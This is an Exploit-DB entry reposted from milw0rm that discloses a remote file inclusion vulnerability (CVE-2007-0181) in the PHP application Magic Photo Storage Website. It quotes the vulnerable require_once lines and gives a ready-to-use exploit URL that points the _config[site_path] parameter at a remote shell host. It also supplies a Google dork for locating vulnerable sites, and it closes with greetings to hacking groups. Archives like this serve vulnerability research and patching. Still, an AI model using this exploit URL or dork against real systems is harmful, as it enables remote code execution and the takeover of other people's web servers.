Magic Photo Storage Website - '_config[site_path]' File Inclusion

EDB-ID:

3100

CVE:

2007-0181

EDB Verified:

Author:

k1tk4t

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-01-08

Vulnerable App:

########################################################################
# magic photo storage website -- Remote File Inclusion
# Vendor         : http://www.scriptaty.net/magic-photo-storage-website.html
# Demo Site      : http://www.turnkeydemos.info/demo/picstorage/
# Found By       : k1tk4t - k1tk4t[4t]newhack.org
# Location       : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
file;
common_function.php

bug;
require_once $_config['site_path'] . '/class/session.class.php';
require_once $_config['site_path'] . '/class/validator.class.php';
require_once $_config['site_path'] . '/include/message.php';
########################################################################
exploit;
http://localhost/include/common_function.php?_config[site_path]=http://shell
########################################################################
Dork;
allinurl:catalog_login.php
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,fusion
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#asiahacker [all member asiahacker community]
#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org

# milw0rm.com [2007-01-08]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services